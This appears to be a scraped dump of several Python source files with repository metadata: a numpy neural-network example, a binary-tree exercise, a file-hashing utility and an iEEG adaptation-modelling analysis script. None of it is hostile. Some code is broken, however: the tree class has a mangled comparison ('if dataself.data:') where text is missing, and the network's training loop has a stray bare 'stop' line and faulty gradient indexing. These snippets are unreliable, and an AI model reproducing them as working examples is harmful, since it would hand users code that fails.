-np.log(a2[range(num_examples),y])\n data_loss = np.sum(correct_logprobs)\n 
return data_loss/num_examples\n\ndef getGradient(model,X,yhat,y,z):\n \"\"\"\n\n \"\"\"\n N = num_examples\n W = model[0]\n b = model[1]\n\n dLdb = [None]*nn_nlayer\n dLdW = [None]*nn_nlayer\n \n dLdb[-1] = [(yhat-y)/N]\n dLdW[-1] = [z[-1]*dLdb]\n\n i = nn_nlayer\n while i > 1:\n i -= 1\n dLdb[i] = dLdb[i+1].dot(np.transpose(W[i+1])) * (1-z[i]*z[i])\n if i != 1:\n dLdW[i] = np.outer(z[i-1],dLdb[i])\n else:\n dLdW[i] = np.outer(X,dLdb[i])\n \n return [dLdW,dLdb]\n\ndef predict(model,x):\n \"\"\"\n \"\"\"\n W1 = model[0]\n b1 = model[1]\n W2 = model[2]\n b2 = model[3]\n\n print('Ndata = %i' %(num_examples))\n print('Nnodes = %i' %(nn_hdim))\n print('din = %i' %(nn_input_dim))\n print('dout = %i' %(nn_output_dim)) \n \n print('x.shape = %s' %(x.shape,))\n print('W1.shape = %s' %(W1.shape,))\n print('b1.shape = %s' %(b1.shape,))\n print('W2.shape = %s' %(W2.shape,))\n print('b2.shape = %s' %(b2.shape,))\n\n z1 = x.dot(W1) + b1\n a1 = np.tanh(z1)\n z2 = a1.dot(W2) + b2\n a2 = softmax(z2)\n\n\n print('z1.shape = %s' %(z1.shape,))\n print('a1.shape = %s' %(a1.shape,))\n print('z2.shape = %s' %(z2.shape,))\n print('a2.shape = %s' %(a2.shape,))\n return np.argmax(a2,axis=1)\n \ndef plotDecisionBoundary(model):\n \"\"\"\n\n \"\"\"\n W1 = model[0]\n b1 = model[1]\n W2 = model[2]\n b2 = model[3]\n\n # Create mesh grid\n\n xmin = min(X[:,0])-0.5\n xmax = max(X[:,0])+0.5\n ymin = min(X[:,1])-0.5\n ymax = max(X[:,1])+0.5\n\n h = 0.01\n xx,yy = np.meshgrid(np.arange(xmin,xmax,h),np.arange(ymin,ymax,h))\n\n Z = predict(model,np.c_[xx.ravel(),yy.ravel()])\n Z = Z.reshape(xx.shape)\n\n plt.contourf(xx,yy,Z,cmap = plt.cm.Spectral)\n plt.scatter(X[:,0], X[:,1], s=40, c=y, cmap=plt.cm.Spectral)\n\n\n\ndef build_model(nn_hdim,num_passes=1):\n \"\"\"\n \"\"\"\n eps = 0.01\n \n W1 = np.random.randn(nn_input_dim, nn_hdim) / np.sqrt(nn_input_dim)\n b1 = np.zeros((1, nn_hdim))\n W2 = np.random.randn(nn_hdim, nn_output_dim) / np.sqrt(nn_hdim)\n b2 = np.zeros((1, nn_output_dim))\n model = {}\n for i in range(num_passes):\n z1 = X.dot(W1) + b1\n a1 = np.tanh(z1)\n z2 = a1.dot(W2) + b2\n a2 = softmax(z2)\n\n delta3 = a2\n delta3[range(num_examples),y] -=1\n\n # print('[range(num_examples),y] = %s' %([range(num_examples),y],))\n dW2 = (a1.T).dot(delta3)\n db2 = np.sum(delta3,axis = 0,keepdims = True)\n delta2 = delta3.dot(W2.T)* (1 - np.power(a1,2))\n dW1 = np.dot(X.T,delta2)\n stop\n db1 = np.sum(delta2,axis=0)\n\n W1 += -eps*dW1\n b1 += -eps*db1 \n W2 += -eps*dW2\n b2 += -eps*db2\n # print('%.3f \\t%i' %(calculateLoss([W1,b1,W2,b2]),i))\n\n model = [W1,b1,W2,b2]\n return model\n\nmodel = build_model(3,num_passes=1000)\n\n\n# X, y = sklearn.datasets.make_moons(200, noise=0.2)\npredict(model,X)\nplotDecisionBoundary(model)\nplt.savefig('decisionBoundary.png')\n","repo_name":"HenrikLundMortensen/neuralNetworkExample","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28479806701","text":"# def add(self, item):\n# \"\"\"\n# 广度优先遍历方式添加结点\n# :param item:\n# :return:\n# \"\"\"\n# if self.root is None:\n# self.root = Node(item)\n# else:\n# queue = []\n# queue.append(self.root)\n\n# while len(queue) > 0:\n# node = queue.pop(0)\n# if not node.lchild:\n# node.lchild = Node(item)\n# return\n# else:\n# queue.append(node.lchild)\n# if not node.rchild:\n# node.rchild = Node(item)\n# return\n# else:\n# queue.append(node.rchild)\n\n# def breadh_travel(self):\n# \"\"\"广度优先遍历\"\"\"\n# if self.root 
is None:\n# return\n# queue = []\n# queue.append(self.root)\n# while len(queue)>0:\n# node = queue.pop(0)\n# print(node.item, end=\" \")\n# if node.lchild:\n# queue.append(node.lchild)\n# if node.rchild:\n# queue.append(node.rchild)\nclass classname(object):\n def __init__(self,data):\n self.left=None\n self.right=None\n self.data=data\n def student(self,data):\n if dataself.data:\n if self.right is None:\n self.right=data\n else:\n self.right.student(data)\ns=classname(10)\nprint(s.student(8))\n\n\n\n","repo_name":"gschen/where2go-python-test","sub_path":"1906101031王卓越/1300-蓝桥杯/year-2010/text-01.py","file_name":"text-01.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"23045780812","text":"# -*- coding: UTF-8 -*-\n# SPDX-License-Identifier: 0BSD\n\n\"\"\"Data Encoding and Hashing\"\"\"\n\nimport base64\nimport hashlib\nimport logging\n\nfrom eljef.core import fops\n\nLOGGER = logging.getLogger(__name__)\n\nBLOCK_SIZE = 65536\n\n\ndef encode_base64(path: str) -> str:\n \"\"\"Reads ``path`` and converts the data to a base64 encode string\n\n Args:\n path: Full path to file to base64 encode contents of\n\n Returns:\n Base64 encoded data as a string\n\n Raises:\n FileNotFoundError: When ``path`` does not exist\n IsADirectoryError: When ``path`` is a directory\n \"\"\"\n LOGGER.debug(\"base64 encoding data from %s\", path)\n with open(path, 'rb') as file_data:\n return fops.makestr(base64.b64encode(file_data.read()))\n\n\ndef hash_md5(path: str) -> str:\n \"\"\"Creates a MD5 hash for ``path``\n\n Args:\n path: Full path to file to create hash for.\n\n Returns:\n string form of MD5 hash\n\n Raises:\n FileNotFoundError: When ``path`` does not exist\n IsADirectoryError: When ``path`` is a directory\n \"\"\"\n LOGGER.debug(\"Generating MD5 hash for %s\", path)\n h_md5 = hashlib.md5()\n with open(path, 'rb') as hash_file:\n buf = hash_file.read(BLOCK_SIZE)\n while buf:\n h_md5.update(buf)\n buf = hash_file.read(BLOCK_SIZE)\n\n return fops.makestr(h_md5.hexdigest())\n\n\ndef hash_sha256(path: str) -> str:\n \"\"\"Creates a SHA256 hash for ``path``\n\n Args:\n path: Full path to file to create hash for.\n\n Returns:\n string form of SHA256 hash\n\n Raises:\n FileNotFoundError: When ``path`` does not exist\n IsADirectoryError: When ``path`` is a directory\n \"\"\"\n LOGGER.debug(\"Generating SHA256 hash for %s\", path)\n h_sha256 = hashlib.sha256()\n with open(path, 'rb') as hash_file:\n buf = hash_file.read(BLOCK_SIZE)\n while buf:\n h_sha256.update(buf)\n buf = hash_file.read(BLOCK_SIZE)\n\n return fops.makestr(h_sha256.hexdigest())\n\n\ndef hash_sha512(path: str) -> str:\n \"\"\"Creates a SHA512 hash for ``path``\n\n Args:\n path: Full path to file to create hash for.\n\n Returns:\n string form of SHA256 hash\n\n Raises:\n FileNotFoundError: When ``path`` does not exist\n IsADirectoryError: When ``path`` is a directory\n \"\"\"\n LOGGER.debug(\"Generating SHA512 hash for %s\", path)\n h_sha512 = hashlib.sha512()\n with open(path, 'rb') as hash_file:\n buf = hash_file.read(BLOCK_SIZE)\n while buf:\n h_sha512.update(buf)\n buf = hash_file.read(BLOCK_SIZE)\n\n return fops.makestr(h_sha512.hexdigest())\n","repo_name":"eljef/python_eljef_core","sub_path":"eljef/core/hash.py","file_name":"hash.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37677193904","text":"# required packages\nimport numpy 
as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import lines\nimport statistics\nfrom sklearn.utils import resample\nfrom scipy.optimize import curve_fit\nfrom scipy.ndimage.filters import gaussian_filter1d\nimport seaborn as sns\n\n# import functions and scripts\nfrom utils import generate_stimulus_timecourse, import_info, import_epochs, select_events, select_events_repetitionTrials, d_prime_perImgCat, estimate_first_pulse\nfrom modelling_utils_paramInit import paramInit\nfrom modelling_utils_fitObjective import model_csDN, model_DN, model_csDN_withoutGeneralScaling, OF_ISI_recovery_log\n\n\n\"\"\"\n\nAuthor: A. Brands\n\n\"\"\"\n\n############################################################################################## ADAPT CODE HERES\n##############################################################################################################\n##############################################################################################################\n##############################################################################################################\n\n# define root directory\nfile = open('setDir.txt')\ndir = file.readline().strip('\\n')\nprint(dir)\n\n# specifiy the trial types\n# img_type = 'all'\n# img_type = 'preferred'\nimg_type = 'nonpreferred'\n\n##############################################################################################################\n##############################################################################################################\n##############################################################################################################\n##############################################################################################################\n\n# assign condition\nif img_type == 'all':\n preference = 0\nelif img_type == 'preferred':\n preference = 1\nelif img_type == 'nonpreferred':\n preference = 2\n\n# import timepoints of on- and offset of stimulus for one and twopulse trials\nt = np.loadtxt(dir+'variables/t.txt', dtype=float)\ntimepoints_onepulse = np.loadtxt(dir+'variables/timepoints_onepulse.txt', dtype=int)\ntimepoints_twopulse = np.loadtxt(dir+'variables/timepoints_twopulse.txt', dtype=int)\ntime_window = np.loadtxt(dir+'variables/time_window.txt', dtype=int)\ntempCond = np.loadtxt(dir+'variables/cond_temp.txt', dtype=float)\nlabel_tempCond = np.array(np.array(tempCond, dtype=int), dtype=str)\n\n# get img. 
classes\nstim_cat = np.loadtxt(dir+'variables/cond_stim.txt', dtype=str)\n\n# determine confidence interval (error)\nCI = 68\nCI_low = 50 - (0.5*CI)\nCI_high = 50 + (0.5*CI)\nB_repetitions = 1000\n\n# trials used for computing the ratio of the second and first peak\ntrials = ['onepulse-4', 'twopulse', 'twopulse_repeat']\naxis = [None, 'TEMP', 'TEMP']\n\n# define model\n# model = 'DN'\nmodel = 'csDN'\n# model = 'csDN_withoutGeneralScaling'\n\n# retrieve parameters\nparams_names, _, _, _ = paramInit(model)\nsample_rate = 512\n\n# create stimulus timecourse\nstim_twopulse = np.zeros((len(tempCond), len(t))) \nfor i in range(len(tempCond)):\n stim_twopulse[i, :] = generate_stimulus_timecourse(trials[2], i, dir)\nstim_onepulse = generate_stimulus_timecourse('onepulse', 3, dir)\n\n# visual areas (labels)\nVA = ['V1-V3', 'VOTC', 'LOTC']\nVA_n = np.zeros(len(VA)) # number of electrodes\nVA_labels = ['V1-V3', 'VOTC', 'LOTC']\ncolors_VA = [[233, 167, 0], [48, 64, 141], [187, 38, 102]]\n\n# electrode coordinates\nelectrodes_visuallyResponsive = pd.read_csv(dir+'subject_data/electrodes_visuallyResponsive_manuallyAssigned.txt', header=0, index_col=0, delimiter=' ')\nn_electrodes = len(electrodes_visuallyResponsive)\n\n# extract electrode indices per visual area (i.e. V1-V3, LOTC, VOTC)\nVA_name_idx_temp = {}\nfor i in range(n_electrodes):\n VA_name_current = electrodes_visuallyResponsive.loc[i, 'varea']\n if VA_name_current not in VA_name_idx_temp:\n VA_name_idx_temp[VA_name_current] = [i]\n else:\n VA_name_idx_temp[VA_name_current].append(i)\nVA_name_idx = {}\nVA_name_idx = {k: VA_name_idx_temp[k] for k in VA}\nprint(VA_name_idx, '\\n')\n\n# fit curve for recovery of adaptation initial parameter values\np0 = [1, 0]\n\n# timescales to fit and plot curves\nt1_plot = np.linspace(min(tempCond), max(tempCond), 1000)\n\n############################################################################\n################################################################### ANALYSIS\n\n# initiate dataframes to store data\nbroadband = []\nbroadband_pulse1 = []\nbroadband_pulse2 = []\n\nbroadband_bootstrap = []\nbroadband_pulse1_bootstrap = []\nbroadband_pulse2_pred_bootstrap = []\n\nbroadband_pred = []\nbroadband_pulse1_pred = []\nbroadband_pulse2_pred = []\n\nbroadband_pred_bootstrap = []\nbroadband_pulse1_pred_bootstrap = []\nbroadband_pulse2_bootstrap = []\n\nISI_recovery = []\nISI_recovery_bootstrap = []\nISI_recovery_avg = np.zeros((len(VA), len(tempCond)))\nISI_recovery_CI = np.zeros((len(VA), len(tempCond), 2))\nISI_recovery_log = np.zeros((len(VA), len(t1_plot)))\n\nISI_recovery_pred = []\nISI_recovery_pred_bootstrap = []\nISI_recovery_pred_avg = np.zeros((len(VA), len(tempCond)))\nISI_recovery_pred_CI = np.zeros((len(VA), len(tempCond), 2))\nISI_recovery_pred_log = np.zeros((len(VA), len(t1_plot)))\n\nadaptation = []\nadaptation_avg = np.zeros(len(VA))\nadaptation_CI = np.zeros((len(VA), 2))\n\nadaptation_pred = []\nadaptation_pred_avg = np.zeros(len(VA))\nadaptation_pred_CI = np.zeros((len(VA), 2))\n\nintercept = []\nintercept_avg = np.zeros(len(VA))\nintercept_CI = np.zeros((len(VA), 2))\n\nintercept_pred = []\nintercept_pred_avg = np.zeros(len(VA))\nintercept_pred_CI = np.zeros((len(VA), 2))\n\n# save medians for statistical testing\nadaptation_medians = np.zeros((len(VA), B_repetitions))\nadaptation_pred_medians = np.zeros((len(VA), B_repetitions))\n\nintercept_medians = np.zeros((len(VA), B_repetitions))\nintercept_pred_medians = np.zeros((len(VA), B_repetitions))\n\ncurrent_subject = ''\ncount_VA = 
0\nfor key, value in VA_name_idx.items():\n\n # count number of electrodes\n n_electrodes = len(value)\n VA_n[count_VA] = n_electrodes\n\n # initiat dataframes\n broadband_current = np.zeros((n_electrodes, len(tempCond), len(t)))\n broadband_pred_current = np.zeros((n_electrodes, len(tempCond), len(t)))\n\n broadband_pulse1_current = np.zeros((n_electrodes, len(t)))\n broadband_pulse1_pred_current = np.zeros((n_electrodes, len(t)))\n\n broadband_pulse2_current = np.zeros((n_electrodes, len(tempCond), len(t)))\n broadband_pulse2_pred_current = np.zeros((n_electrodes, len(tempCond), len(t)))\n\n broadband_bootstrap_current = np.zeros((B_repetitions, len(tempCond), len(t)))\n broadband_bootstrap_pred_current = np.zeros((B_repetitions, len(tempCond), len(t)))\n\n broadband_pulse1_bootstrap_current = np.zeros((B_repetitions, len(t)))\n broadband_pulse1_bootstrap_pred_current = np.zeros((B_repetitions, len(t)))\n\n broadband_pulse2_bootstrap_current = np.zeros((B_repetitions, len(tempCond), len(t)))\n broadband_pulse2_bootstrap_pred_current = np.zeros((B_repetitions, len(tempCond), len(t)))\n\n ISI_recovery_current = np.zeros((B_repetitions, len(tempCond)))\n ISI_recovery_pred_current = np.zeros((B_repetitions, len(tempCond)))\n\n ISI_recovery_bootstrap_current = np.zeros((B_repetitions, len(tempCond)))\n ISI_recovery_bootstrap_pred_current = np.zeros((B_repetitions, len(tempCond)))\n\n adaptation_current = np.zeros(B_repetitions)\n adaptation_pred_current = np.zeros(B_repetitions)\n\n intercept_current = np.zeros(B_repetitions)\n intercept_pred_current = np.zeros(B_repetitions)\n\n # iterate over electrodes\n for i in range(n_electrodes):\n # for i in range(1):\n\n # retrieve info current electrode\n subject = electrodes_visuallyResponsive.subject[value[i]]\n electrode_name = electrodes_visuallyResponsive.electrode[value[i]]\n electrode_idx = int(electrodes_visuallyResponsive.electrode_idx[value[i]])\n\n # print progress\n print(30*'-')\n print(key)\n print(30*'-')\n print('Computing trials for ' + subject + ', electrode ' + electrode_name + ' (' + str(i+1) + '/' + str(n_electrodes) + ')')\n\n # retrieve model parameters for current electrode\n temp = pd.read_csv(dir+'modelFit/visuallyResponsive/' + subject + '_' + electrode_name + '/param_' + model + '.txt', header=0, delimiter=' ', index_col=0)\n temp.reset_index(inplace=True,drop=True)\n params_current = list(temp.loc[0, params_names])\n\n if current_subject != subject:\n\n # update current subject\n current_subject = subject\n\n # import info\n _, events, channels, _ = import_info(subject, dir)\n\n # import excluded trials\n excluded_epochs = pd.read_csv(dir+'subject_data/' + subject + '/excluded_epochs.txt', sep=' ', header=0, dtype=int)\n\n # extract data\n epochs_b = import_epochs(subject, electrode_idx, dir)\n index_epochs_b = [j for j in range(len(events)) if excluded_epochs.iloc[electrode_idx, j+1] == 1]\n epochs_b.iloc[:, index_epochs_b] = np.nan\n\n # extract data\n cat = None\n if (img_type == 'preferred') | (img_type == 'nonpreferred'):\n\n # determine category selectivity\n event_idx_onepulse = select_events(events, 'STIM', 'onepulse', dir)\n d_prime_temp = d_prime_perImgCat(epochs_b, event_idx_onepulse, stim_cat).tolist() # double-check for/confirm img. category selection\n\n preferred_cat_index = np.argmax(d_prime_temp[0:-1]) # P\n preferred_cat = stim_cat[preferred_cat_index]\n\n npreferred_cat_index = np.argmin(d_prime_temp[0:-1]) # NP\n npreferred_cat = stim_cat[npreferred_cat_index]\n\n print('Preferred img. 
cat.: ', preferred_cat)\n cat = [preferred_cat, npreferred_cat]\n\n # select events\n event_idx = select_events_repetitionTrials(events, tempCond, preference, cat)\n \n else:\n\n # select events\n event_idx = select_events_repetitionTrials(events, tempCond, preference) \n\n # get onepulse trials\n # NEURAL DATA\n data_first_pulse = estimate_first_pulse(t, epochs_b, event_idx, timepoints_twopulse)\n broadband_pulse1_current[i, :] = data_first_pulse\n\n # for 5 remaining img classes\n if model == 'csDN':\n if preference == 0: # all \n temp = np.zeros((len(stim_cat), len(t))) # all image categories expect preferred\n for l in range(len(stim_cat)):\n _, temp[l, :] = model_csDN(stim_onepulse, 'onepulse', 3, stim_cat[l], sample_rate, params_current, dir) \n broadband_pulse1_pred_current[i, :] = np.mean(temp, 0)\n elif preference == 1: # preferred\n _, broadband_pulse1_pred_current[i, :] = model_csDN(stim_onepulse, 'onepulse', 3, cat[0], sample_rate, params_current, dir) \n elif preference == 2: # nonpreferred\n temp = np.zeros((len(stim_cat)-1, len(t))) # all image categories expect preferred\n num = 0\n for l in range(len(stim_cat)):\n if stim_cat[l] != cat[0]:\n _, temp[num, :] = model_csDN(stim_onepulse, 'onepulse', 3, stim_cat[l], sample_rate, params_current, dir) \n num+=1\n broadband_pulse1_pred_current[i, :] = np.mean(temp, 0)\n elif model == 'csDN_withoutGeneralScaling':\n if preference == 0: # all \n temp = np.zeros((len(stim_cat), len(t))) # all image categories expect preferred\n for l in range(len(stim_cat)):\n _, temp[l, :] = model_csDN_withoutGeneralScaling(stim_onepulse, 'onepulse', 3, stim_cat[l], sample_rate, params_current, dir) \n broadband_pulse1_pred_current[i, :] = np.mean(temp, 0)\n elif preference == 1: # preferred\n _, broadband_pulse1_pred_current[i, :] = model_csDN_withoutGeneralScaling(stim_onepulse, 'onepulse', 3, cat[0], sample_rate, params_current, dir) \n elif preference == 2: # nonpreferred\n temp = np.zeros((len(stim_cat)-1, len(t))) # all image categories expect preferred\n num = 0\n for l in range(len(stim_cat)):\n if stim_cat[l] != cat[0]:\n _, temp[num, :] = model_csDN_withoutGeneralScaling(stim_onepulse, 'onepulse', 3, stim_cat[l], sample_rate, params_current, dir) \n num+=1\n broadband_pulse1_pred_current[i, :] = np.mean(temp, 0)\n elif model == 'DN':\n broadband_pulse1_pred_current[i, :] = model_DN(stim_onepulse[j, :], sample_rate, params_current)\n\n # retrieve broadband data\n for j in range(len(tempCond)):\n\n # select twouplse\n # NEURAL DATA\n broadband_current[i, j, :] = np.nanmean(epochs_b[event_idx[2][j]], axis=1)\n\n # MODEL\n if model == 'csDN':\n if preference == 0: # all \n temp = np.zeros((len(stim_cat), len(t))) # all image categories expect preferred\n for l in range(len(stim_cat)):\n _, temp[l, :] = model_csDN(stim_twopulse[j, :], 'twopulse_repeat', j, stim_cat[l], sample_rate, params_current, dir) \n broadband_pred_current[i, j, :] = np.mean(temp, 0)\n elif preference == 1:\n _, broadband_pred_current[i, j, :] = model_csDN(stim_twopulse[j, :], 'twopulse_repeat', j, cat[0], sample_rate, params_current, dir) \n elif preference == 2:\n temp = np.zeros((len(stim_cat)-1, len(t))) # all image categories expect preferred\n num = 0\n for l in range(len(stim_cat)):\n if stim_cat[l] != cat[0]:\n _, temp[num, :] = model_csDN(stim_twopulse[j, :], 'twopulse_repeat', j, stim_cat[l], sample_rate, params_current, dir) \n num+=1\n broadband_pred_current[i, j, :] = np.mean(temp, 0)\n elif model == 'csDN_withoutGeneralScaling':\n if preference == 0: # all 
\n temp = np.zeros((len(stim_cat), len(t))) # all image categories expect preferred\n for l in range(len(stim_cat)):\n _, temp[l, :] = model_csDN_withoutGeneralScaling(stim_twopulse[j, :], 'twopulse_repeat', j, stim_cat[l], sample_rate, params_current, dir) \n broadband_pred_current[i, j, :] = np.mean(temp, 0)\n elif preference == 1:\n _, broadband_pred_current[i, j, :] = model_csDN_withoutGeneralScaling(stim_twopulse[j, :], 'twopulse_repeat', j, cat[0], sample_rate, params_current, dir) \n elif preference == 2:\n temp = np.zeros((len(stim_cat)-1, len(t))) # all image categories expect preferred\n num = 0\n for l in range(len(stim_cat)):\n if stim_cat[l] != cat[0]:\n _, temp[num, :] = model_csDN_withoutGeneralScaling(stim_twopulse[j, :], 'twopulse_repeat', j, stim_cat[l], sample_rate, params_current, dir) \n num+=1\n broadband_pred_current[i, j, :] = np.mean(temp, 0)\n elif model == 'DN':\n broadband_pred_current[i, j, :] = model_DN(stim_twopulse[j, :], sample_rate, params_current)\n \n # compute isolated second pulse\n # NEURAL DATA\n broadband_pulse2_current[i, j, :] = broadband_current[i, j, :] - data_first_pulse\n\n # MODEL\n broadband_pulse2_pred_current[i, j, :] = broadband_pred_current[i, j, :] - broadband_pulse1_pred_current[i, :]\n\n # perform bootstrap over broadband timecourse\n ISI_recovery_log_current = np.zeros((B_repetitions, len(t1_plot)))\n ISI_recovery_log_pred_current = np.zeros((B_repetitions, len(t1_plot)))\n for i in range(B_repetitions):\n\n # draw random sample\n idx_temp = np.arange(n_electrodes)\n n_samples = len(idx_temp)\n boot = resample(idx_temp, replace=True, n_samples=n_samples)\n\n # compute first pulse\n data_mean = np.zeros((len(boot), len(t)))\n model_mean = np.zeros((len(boot), len(t)))\n for l in range(len(boot)):\n data_mean[l, :] = broadband_pulse1_current[boot[l], :]\n model_mean[l, :] = broadband_pulse1_pred_current[boot[l], :]\n broadband_pulse1_bootstrap_current[i, :] = np.nanmean(data_mean, 0)\n broadband_pulse1_bootstrap_pred_current[i, :] = np.nanmean(model_mean, 0)\n\n # compute tempCond recovery\n adaptation_temp = np.zeros(len(tempCond))\n adaptation_pred_temp = np.zeros(len(tempCond))\n \n for j in range(len(tempCond)):\n\n # compute degree of recovery\n start_firstpulse = timepoints_onepulse[0, 0]\n start_second_pulse = timepoints_twopulse[j, 2]\n\n # retrieve broadband\n # NEURAL DATA\n data = np.zeros((len(boot), len(t)))\n data_pulse1 = np.zeros((len(boot), len(t)))\n for l in range(len(boot)):\n data[l, :] = broadband_current[boot[l], j, :]\n data_pulse1[l, :] = broadband_pulse2_current[boot[l], j, :]\n broadband_bootstrap_current[i, j, :] = np.nanmean(data, 0)\n broadband_pulse2_bootstrap_current[i, j, :] = np.nanmean(data_pulse1, 0)\n\n # compute degree of recovery\n AUC1 = np.trapz(broadband_pulse1_bootstrap_current[i, :][start_firstpulse: start_firstpulse+time_window])\n AUC2 = np.trapz(broadband_pulse2_bootstrap_current[i, j, :][start_second_pulse:start_second_pulse+time_window])\n\n ISI_recovery_bootstrap_current[i, j] = AUC2/AUC1\n adaptation_temp[j] = AUC2/AUC1\n\n # MODEL\n pred = np.zeros((len(boot), len(t)))\n pred_pulse1 = np.zeros((len(boot), len(t)))\n for l in range(len(boot)):\n pred[l, :] = broadband_pred_current[boot[l], j, :]\n pred_pulse1[l, :] = broadband_pulse2_pred_current[boot[l], j, :]\n broadband_bootstrap_pred_current[i, j, :] = np.nanmean(pred, 0)\n broadband_pulse2_bootstrap_pred_current[i, j, :] = np.nanmean(pred_pulse1, 0)\n \n # compute degree of recovery\n AUC1 = 
np.trapz(broadband_pulse1_bootstrap_pred_current[i, :][start_firstpulse: start_firstpulse+time_window])\n AUC2 = np.trapz(broadband_pulse2_bootstrap_pred_current[i, j, :][start_second_pulse:start_second_pulse+time_window])\n\n ISI_recovery_bootstrap_pred_current[i, j] = AUC2/AUC1\n adaptation_pred_temp[j] = AUC2/AUC1\n\n # normalize responses to maximum (over all temporal conditions)\n broadband_bootstrap_current[i, :, :] = broadband_bootstrap_current[i, :, :]/np.amax(broadband_bootstrap_current[i, :, :]) \n broadband_bootstrap_pred_current[i, :, :] = broadband_bootstrap_pred_current[i, :, :]/np.amax(broadband_bootstrap_pred_current[i, :, :]) \n \n # NEURAL DATA\n # popt, _ = curve_fit(OF_ISI_recovery_log, tempCond, tempCond_recovery_bootstrap_current[i, :], p0, maxfev=100000) #, bounds=((0, 0), (np.inf, np.inf)))\n popt, _ = curve_fit(OF_ISI_recovery_log, tempCond/1000, adaptation_temp, p0, maxfev=1000) #, bounds=((0, 0), (np.inf, np.inf)))\n ISI_recovery_log_current[i, :] = OF_ISI_recovery_log(t1_plot/1000, *popt)\n intercept_current[i] = popt[0]\n intercept_medians[count_VA, i] = popt[0]\n adaptation_current[i] = np.mean(ISI_recovery_bootstrap_current[i, :])\n adaptation_medians[count_VA, i] = np.mean(ISI_recovery_bootstrap_current[i, :])\n\n # MODEL\n popt, _ = curve_fit(OF_ISI_recovery_log, tempCond/1000, adaptation_pred_temp, p0, maxfev=1000) #, bounds=((0, 0), (np.inf, np.inf)))\n ISI_recovery_log_pred_current[i, :] = OF_ISI_recovery_log(t1_plot/1000, *popt)\n intercept_pred_current[i] = popt[0]\n intercept_pred_medians[count_VA, i] = popt[0]\n adaptation_pred_current[i] = np.mean(ISI_recovery_bootstrap_pred_current[i, :])\n adaptation_pred_medians[count_VA, i] = np.mean(ISI_recovery_bootstrap_pred_current[i, :])\n\n # compute spread\n # NEURAL DATA\n adaptation_avg[count_VA] = np.mean(adaptation_current)\n adaptation_CI[count_VA, :] = np.nanpercentile(adaptation_current, [CI_low, CI_high])\n\n intercept_avg[count_VA] = np.mean(intercept_current)\n intercept_CI[count_VA, :] = np.nanpercentile(intercept_current, [CI_low, CI_high])\n\n ISI_recovery_log[count_VA] = np.mean(ISI_recovery_log_current, 0)\n for i in range(len(tempCond)):\n ISI_recovery_avg[count_VA, i] = np.mean(ISI_recovery_bootstrap_current[:, i])\n ISI_recovery_CI[count_VA, i, :] = np.nanpercentile(ISI_recovery_bootstrap_current[:, i], [CI_low, CI_high])\n\n # MODEL\n adaptation_pred_avg[count_VA] = np.mean(adaptation_pred_current)\n adaptation_pred_CI[count_VA, :] = np.nanpercentile(adaptation_pred_current, [CI_low, CI_high])\n\n intercept_pred_avg[count_VA] = np.mean(intercept_pred_current)\n intercept_pred_CI[count_VA, :] = np.nanpercentile(intercept_pred_current, [CI_low, CI_high])\n\n ISI_recovery_pred_log[count_VA] = np.mean(ISI_recovery_log_pred_current, 0)\n for i in range(len(tempCond)):\n ISI_recovery_pred_avg[count_VA, i] = np.mean(ISI_recovery_bootstrap_pred_current[:, i])\n ISI_recovery_pred_CI[count_VA, i, :] = np.nanpercentile(ISI_recovery_bootstrap_pred_current[:, i], [CI_low, CI_high])\n\n # append dataframes\n # NEURAL DATA\n broadband.append(broadband_current)\n broadband_pulse1.append(broadband_pulse1_current)\n broadband_pulse2.append(broadband_pulse2_current)\n\n broadband_bootstrap.append(broadband_bootstrap_current)\n broadband_pulse1_bootstrap.append(broadband_pulse1_bootstrap_current)\n broadband_pulse2_bootstrap.append(broadband_pulse2_bootstrap_current)\n\n ISI_recovery.append(ISI_recovery_current)\n ISI_recovery_bootstrap.append(ISI_recovery_bootstrap_current)\n\n 
adaptation.append(adaptation_current)\n intercept.append(intercept_current)\n\n # MODEL\n broadband_pred.append(broadband_pred_current)\n broadband_pulse1_pred.append(broadband_pulse1_pred_current)\n broadband_pulse2_pred.append(broadband_pulse2_pred_current)\n\n broadband_pred_bootstrap.append(broadband_bootstrap_pred_current)\n broadband_pulse1_pred_bootstrap.append(broadband_pulse1_bootstrap_pred_current)\n broadband_pulse2_pred_bootstrap.append(broadband_pulse2_bootstrap_pred_current)\n\n ISI_recovery_pred.append(ISI_recovery_pred_current)\n ISI_recovery_pred_bootstrap.append(ISI_recovery_bootstrap_pred_current)\n\n adaptation_pred.append(adaptation_pred_current)\n intercept_pred.append(intercept_pred_current)\n\n # increment count\n count_VA+=1\n\n\n############################################################################\n############################################################### PLOT RESULTS\n\n# initiate figure\nfig = plt.figure(figsize=(18, 24))\ngs = fig.add_gridspec(36, 20)\nax = dict()\n\n# initiate plots\nax['broadband'] = fig.add_subplot(gs[0:3, 0:20])\nax['broadband_pred'] = fig.add_subplot(gs[4:7, 0:20])\n\nax['broadband_isolation_E'] = fig.add_subplot(gs[10:14, 0:3])\nax['broadband_isolation_V'] = fig.add_subplot(gs[10:14, 7:10])\nax['broadband_isolation_L'] = fig.add_subplot(gs[10:14, 14:17])\nax_broadband_isolation = [ax['broadband_isolation_E'], ax['broadband_isolation_V'], ax['broadband_isolation_L']]\n\nax['broadband_isolation_E_pred'] = fig.add_subplot(gs[10:14, 3:6])\nax['broadband_isolation_V_pred'] = fig.add_subplot(gs[10:14, 10:13])\nax['broadband_isolation_L_pred'] = fig.add_subplot(gs[10:14, 17:20])\nax_broadband_isolation_pred = [ax['broadband_isolation_E_pred'], ax['broadband_isolation_V_pred'], ax['broadband_isolation_L_pred']]\n\nax['ISI_recovery'] = fig.add_subplot(gs[17:24, 0:9]) \nax['ISI_recovery_pred'] = fig.add_subplot(gs[17:24, 11:20]) \n\nax['adaptation'] = fig.add_subplot(gs[30:36, 0:8])\nax['intercept'] = fig.add_subplot(gs[30:36, 12:20])\n\n# seperate axes\nsns.despine(offset=10)\n\n# set ticks\nadd = np.zeros((len(VA), len(tempCond)))\nstart_add = [0.016, 0.017, 0.018]\nadd[:, 0] = start_add\nfor i in range(len(VA)):\n for j in range(1, 